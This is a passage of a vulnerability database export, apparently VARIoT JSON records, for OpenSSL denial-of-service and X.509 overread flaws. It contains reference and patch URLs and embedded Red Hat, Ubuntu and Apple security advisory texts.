"SECTRACK", "id": "1037084", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2016-008860", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201610-726", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2173", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "141173", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "141752", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-92490", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-97430", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-8610", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142848", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143874", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142847", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143176", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143873", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143181", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140850", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-97430" }, { "db": "VULMON", "id": "CVE-2016-8610" }, { "db": "BID", "id": "93841" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "142847" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143873" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "140850" }, { "db": "CNNVD", "id": "CNNVD-201610-726" }, { "db": "NVD", "id": "CVE-2016-8610" } ] }, "id": "VAR-201711-0007", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-97430" } ], "trust": 0.35113123999999996 }, "last_update_date": "2024-07-23T21:57:50.988000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Don\u0027t\u00a0allow\u00a0too\u00a0many\u00a0consecutive\u00a0warning\u00a0alerts Red hat Red\u00a0Hat\u00a0Bugzilla", "trust": 0.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=af58be768ebb690f78530f796e92b8ae5c9a4401" }, { "title": "OpenSSL Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=65089" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170286 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171659 - security advisory" }, { "title": "Red Hat: Moderate: gnutls security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170574 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171658 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 6", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171414 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171415 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 7", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171413 - security advisory" }, { "title": "Debian Security Advisories: DSA-3773-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=9f660812dd6a423f7e72aa57751d0031" }, { "title": "Red Hat: CVE-2016-8610", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-8610" }, { "title": "Amazon Linux AMI: ALAS-2017-803", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2017-803" }, { "title": "Ubuntu Security Notice: gnutls26 vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3183-2" }, { "title": "Ubuntu Security Notice: gnutls26, gnutls28 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3183-1" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3181-1" }, { "title": "Red Hat: Important: Red Hat JBoss Web Server 3.1.0 Service Pack 1 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171801 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Web Server Service Pack 1 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171802 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2017-815", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2017-815" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=ecbe5f193404d1e9c62e8323118ae6cf" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=04299a624c15ae57f9f110f484bc5f66" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=d78b3379ca364568964f30138964c7e7" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=bf8deceb640f4a0fee008855afe6aa85" }, { "title": "CVE-2016-8610-PoC", "trust": 0.1, "url": "https://github.com/cujanovic/cve-2016-8610-poc " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-8610" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "CNNVD", "id": "CNNVD-201610-726" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-400", "trust": 1.1 }, { "problemtype": "Resource exhaustion (CWE-400) [NVD evaluation ]", "trust": 0.8 }, { "problemtype": "CWE-399", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-97430" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "NVD", "id": "CVE-2016-8610" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.securityfocus.com/bid/93841" }, { "trust": 2.1, "url": "http://seclists.org/oss-sec/2016/q4/224" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2017:1413" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2017-1415.html" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2017:1658" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2017-1659.html" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2017:2493" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2017:2494" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1037084" }, { "trust": 1.8, "url": "https://www.debian.org/security/2017/dsa-3773" }, { "trust": 1.8, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:35.openssl.asc" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2017-0286.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2017-0574.html" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2017:1414" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2017:1801" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2017:1802" }, { "trust": 1.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2016-8610" }, { "trust": 1.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=af58be768ebb690f78530f796e92b8ae5c9a4401" }, { "trust": 1.8, "url": "https://security.360.cn/cve/cve-2016-8610/" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20171130-0001/" }, { "trust": 1.8, "url": "https://security.paloaltonetworks.com/cve-2016-8610" }, { "trust": 1.8, "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "trust": 1.8, "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "trust": 1.8, "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "trust": 1.8, "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03897en_us" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8610" }, { "trust": 0.9, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=af58be768ebb690f78530f796e92b8ae5c9a4401" }, { "trust": 0.9, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/87" }, { "trust": 0.6, "url": "https://access.redhat.com/security/cve/cve-2016-8610" }, { "trust": 0.6, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.6, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.6, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.6, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.6, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.6, "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191553-1.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2173/" }, { "trust": 0.4, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory22.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994867" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21996760" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21997209" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7056" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-8740" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-0736" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8743" }, { "trust": 0.2, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-8743" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2161" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8740" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-7056" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0736" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2161" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2017-5664" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2017-5647" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5647" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/3155411" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5664" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.2, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.2, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03897en_us" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/400.html" }, { "trust": 0.1, "url": "https://github.com/cujanovic/cve-2016-8610-poc" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49575" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3183-2/" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=securitypatches\u0026version=2.4.23" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.1.2" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.6" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu9.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.22" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3731" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.39" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-3181-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7055" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3732" } ], "sources": [ { "db": "VULHUB", "id": "VHN-97430" }, { "db": "VULMON", "id": "CVE-2016-8610" }, { "db": "BID", "id": "93841" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "142847" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143873" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "140850" }, { "db": "CNNVD", "id": "CNNVD-201610-726" }, { "db": "NVD", "id": "CVE-2016-8610" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-97430" }, { "db": "VULMON", "id": "CVE-2016-8610" }, { "db": "BID", "id": "93841" }, { "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "142847" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143873" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "140850" }, { "db": "CNNVD", "id": "CNNVD-201610-726" }, { "db": "NVD", "id": "CVE-2016-8610" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-13T00:00:00", "db": "VULHUB", "id": "VHN-97430" }, { "date": "2017-11-13T00:00:00", "db": "VULMON", "id": "CVE-2016-8610" }, { "date": "2016-10-24T00:00:00", "db": "BID", "id": "93841" }, { "date": "2017-12-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "date": "2017-06-07T22:47:57", "db": "PACKETSTORM", "id": "142848" }, { "date": "2017-08-22T05:29:02", "db": "PACKETSTORM", "id": "143874" }, { "date": "2017-06-07T22:47:43", "db": "PACKETSTORM", "id": "142847" }, { "date": "2017-06-28T22:12:00", "db": "PACKETSTORM", "id": "143176" }, { "date": "2017-08-22T05:28:16", "db": "PACKETSTORM", "id": "143873" }, { "date": "2017-06-28T22:37:00", "db": "PACKETSTORM", "id": "143181" }, { "date": "2017-02-01T00:36:45", "db": "PACKETSTORM", "id": "140850" }, { "date": "2016-10-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201610-726" }, { "date": "2017-11-13T22:29:00.203000", "db": "NVD", "id": "CVE-2016-8610" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-12T00:00:00", "db": "VULHUB", "id": "VHN-97430" }, { "date": "2023-02-12T00:00:00", "db": "VULMON", "id": "CVE-2016-8610" }, { "date": "2017-08-22T08:11:00", "db": "BID", "id": "93841" }, { "date": "2024-02-27T03:18:00", "db": "JVNDB", "id": "JVNDB-2016-008860" }, { "date": "2023-02-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201610-726" }, { "date": "2024-01-26T17:44:24.227000", "db": "NVD", "id": "CVE-2016-8610" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "140850" }, { "db": "CNNVD", "id": "CNNVD-201610-726" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL\u00a0 Service operation interruption in \u00a0(DoS)\u00a0 Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-008860" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201610-726" } ], "trust": 0.6 } }
var-201708-1311
Vulnerability from variot
While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g. OpenSSL is prone to a security-bypass vulnerability. Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. Summary:
Security Advisory
- Description:
Red Hat Ansible Tower 3.3.1 is now available and contains the following bug fixes:
-
- Fixed event callback error when in-line vaulted variables are used with
include_vars
- Fixed event callback error when in-line vaulted variables are used with
-
- Fixed HSTS and X-Frame-Options to properly be set in nginx configuration
-
- Fixed isolated node setup to no longer fail when
ansible_host
is used
- Fixed isolated node setup to no longer fail when
-
- Fixed selection of custom virtual environments in job template creation
-
- Fixed websockets for job details to properly work
-
- Fixed the
/api/v2/authtoken
compatibility shim
- Fixed the
-
- Fixed page size selection on the jobs screen
-
- Fixed instances in an instance group to properly be disabled in the user interface
-
- Fixed the job template selection in workflow creation to properly render
-
- Fixed
member_attr
to properly set on some LDAP configurations during upgrade, preventing login
- Fixed
-
- Fixed
PosixUIDGroupType
LDAP configurations
- Fixed
-
- Improved the RAM requirement in the installer preflight check
-
- Updated Tower to properly report an error when relaunch was used on a set of failed hosts that is too large
-
- Updated sosreport configuration to gather more python environment, nginx, and supervisor configuration
-
- Fixed display of extra_vars for scheduled jobs
-
Solution:
The Ansible Tower Upgrade and Migration Guide is available at: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/ index.html
- ========================================================================== Ubuntu Security Notice USN-3611-2 April 17, 2018
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
Several security issues were fixed in OpenSSL. This update provides the corresponding update for Ubuntu 12.04 ESM. (CVE-2017-3735)
It was discovered that OpenSSL incorrectly handled certain ASN.1 types. A remote attacker could possibly use this issue to cause a denial of service. (CVE-2018-0739)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 ESM: libssl1.0.0 1.0.1-4ubuntu5.40 openssl 1.0.1-4ubuntu5.40
After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2017-12-6-1 macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan
macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan are now available and address the following:
apache Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory Description: Multiple issues were addressed by updating to version 2.4.28. CVE-2017-9798
curl Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory Description: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking. CVE-2017-1000254: Max Dymond
Directory Utility Available for: macOS High Sierra 10.13 and macOS High Sierra 10.13.1 Not impacted: macOS Sierra 10.12.6 and earlier Impact: An attacker may be able to bypass administrator authentication without supplying the administrator's password Description: A logic error existed in the validation of credentials. This was addressed with improved credential validation. CVE-2017-13872
Intel Graphics Driver Available for: macOS High Sierra 10.13.1 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13883: an anonymous researcher
Intel Graphics Driver Available for: macOS High Sierra 10.13.1 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2017-13878: Ian Beer of Google Project Zero
Intel Graphics Driver Available for: macOS High Sierra 10.13.1 Impact: An application may be able to execute arbitrary code with system privileges Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2017-13875: Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13844: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)
IOKit Available for: macOS High Sierra 10.13.1 Impact: An application may be able to execute arbitrary code with system privileges Description: An input validation issue existed in the kernel. This issue was addressed through improved input validation. CVE-2017-13848: Alex Plaskett of MWR InfoSecurity CVE-2017-13858: an anonymous researcher
IOKit Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues were addressed through improved state management. CVE-2017-13847: Ian Beer of Google Project Zero
Kernel Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13862: Apple
Kernel Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2017-13833: Brandon Azad
Kernel Available for: macOS High Sierra 10.13.1 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13876: Ian Beer of Google Project Zero
Kernel Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to read restricted memory Description: A type confusion issue was addressed with improved memory handling. CVE-2017-13855: Jann Horn of Google Project Zero
Kernel Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13867: Ian Beer of Google Project Zero
Kernel Available for: macOS High Sierra 10.13.1 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2017-13865: Ian Beer of Google Project Zero
Kernel Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2017-13868: Brandon Azad CVE-2017-13869: Jann Horn of Google Project Zero
Mail Available for: macOS High Sierra 10.13.1 Impact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed Description: An inconsistent user interface issue was addressed with improved state management. CVE-2017-13871: an anonymous researcher
Mail Drafts Available for: macOS High Sierra 10.13.1 Impact: An attacker with a privileged network position may be able to intercept mail Description: An encryption issue existed with S/MIME credetials. The issue was addressed with additional checks and user control. CVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH
OpenSSL Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to read restricted memory Description: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking. CVE-2017-3735: found by OSS-Fuzz
Screen Sharing Server Available for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6 Impact: A user with screen sharing access may be able to access any file readable by root Description: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling. CVE-2017-13826: Trevor Jacques of Toronto
Installation note:
macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlooN9kpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbvlg/7 Bub6HL7Bv+9taMMz+3Rl2exjVIBv3fUflhpLh1524wFe6UjUyy4Z3X0t/LKogGwb GkHmcvDTK+85yLJeF0XQLHzzeITPrAiQ06FSnpzq6GjDEgczgbyJtw6aT4iagDgK NYfWnmU1XDjpx35kjEyyZblIxDHsvMJRelMdjx4w6In3Pgi+DG+ndYbK5hoaImOX Ywaoc2xzGUXpnJU6Y5tkIbVBF4P4tZQcJJt6cfhTOcR9+ut87HQqc9mo1UGMUqAv z0kYZ4MtGRM4uDiVynkKxwj+NNtSVxwvf1mN2Jb7ApFt0lAfmS8L8xzI15NlbJxJ oSuIvVi3pAhOkO7etaC/CLOxw+wRGaRbaf1i4VmaLI6HW2H2/vWiL1KDhHFIIfVq xBGday+yWkaS9o8B85QZy2GHxEFYxzMvArtzK3tBj2kZCuEcJis60CanwZOSbcsp 4IlEKVGabMNwGwOVX22UwrLCtMzsqSVZpYyKy/m7n6DXnpspuWTohDmc68zq/4nj 5LgGTFz8IUaT1ujQZq9g4siVeXzu0bsAgttauRlrWilUsDtpsv5s+dkGlXPFxbDf BuvNgqGSg/xz0QRGmJ7UA3g3L7fTvWhOzXnBOh7c45OpYT54tqGIEi6Bk72NyPz+ ioQ7LBPJE6RCSy5XZJ6x8YwSYp+kO8BBPaYsxSoxXCs= =2VBd -----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
